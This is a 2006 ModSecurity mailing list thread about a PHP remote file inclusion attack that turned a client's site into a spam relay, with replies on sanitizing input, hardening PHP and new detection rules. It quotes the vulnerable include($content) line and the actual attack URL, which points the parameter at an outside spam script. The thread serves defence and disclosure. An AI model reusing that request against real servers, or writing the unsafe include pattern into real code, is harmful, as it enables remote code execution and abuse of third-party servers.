[Modsecurity] Spam injection, very sneeky

Michael Shinn mike at gotroot.com
Fri Oct 13 23:18:31 EDT 2006 

Thank you all for the report. The generic sigs should have caught this,
but I'm never happy with a should, so I just tuned this sig to make it
even broader in case I missed something (please let me know about all
false positives).

I just added another rule to catch any other variations of this I might
have missed.  To that end, if anyone sees rule 300040 fire (ever!)
please let me know and send me your audit_log entries.  This should
catch the exception that I just can't presently imagine, and I always
appreciate new opportunities to make the sigs better.

Thank you again for the report, please keep them coming as I'm always
happy to make more sigs.  :-)

New release coming out in a few minutes.

On Fri, 2006-10-13 at 17:11 -0400, Michal Wallace wrote:
> On Fri, 13 Oct 2006, MIKE YRABEDRA wrote:
> 
> > I have been using modsec to block all sorts of spam injection, but I have
> > found a new one.
> > 
> > I have a client that has a blanket style pages that includes anyhting sent
> > to it.  Like so...
> > 
> > <? include($content); ?>
> > 
> > So if someone does this...
> > 
> > http://www.somesite.com/folder/index.php?content=http://home.arcor.de/dumpxp
> > l/mail.php?
> > 
> > ..bad things happen. In my case over 100k of spam being relayed by my
> > server.
> > 
> > I caught this guy using modsec and searching ARGS with the same text as in
> > the spam. This is OK for now, until he uses a different spam.
> > 
> > 
> > The php script that did the damage can be seen here...
> > http://home.arcor.de/dumpxpl/mail.php
> > 
> > Is there a modsec rule that will prevent this sort of thing?
> 
> Hey Mike,
> 
> PHP's remote include "feature" is wrong
> on so many levels. One thing you can do in
> this case is have the client sanitize the 
> $content variable so it doesn't do this.
> There's usually no reason it has to have 
> the http:// in there, and if there is,
> you can limit it to the sites he actually
> wants to use.
> 
> Or he could just fetch the url and print
> the contents, rather than using include().
> 
> Or you could patch PHP so it doesn't let
> this happen:
> 
>     http://www.hardened-php.net/
> 
> At the very least, you should scan for 
> http:// in the args. I'm surprised the gotroot
> rules didn't catch this. I'm pretty sure 
> there was a rule that did this already for 
> any php file.
> 
> Sincerely,
>  
> Michal J Wallace
> Sabren Enterprises, Inc.
> -------------------------------------
> contact: michal at sabren.com
> hosting: http://www.cornerhost.com/
> my site: http://www.withoutane.com/
> -------------------------------------
> 
> _______________________________________________
> Modsecurity mailing list
> Modsecurity at gotroot.com
> http://lists.gotroot.com/mailman/listinfo/modsecurity
-- 
Michael T. Shinn                                    KeyID:0xDAE2EC86
Key Fingerprint:  1884 E657 A6DF DF1B BFB9 E2C5 DCC6 5297 DAE2 EC86
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xDAE2EC86
  
Got Root?  http://www.gotroot.com
modsecurity rules: http://www.modsecurityrules.com
Troubleshooting Firewalls:  http://troubleshootingfirewalls.com

More information about the Modsecurity mailing list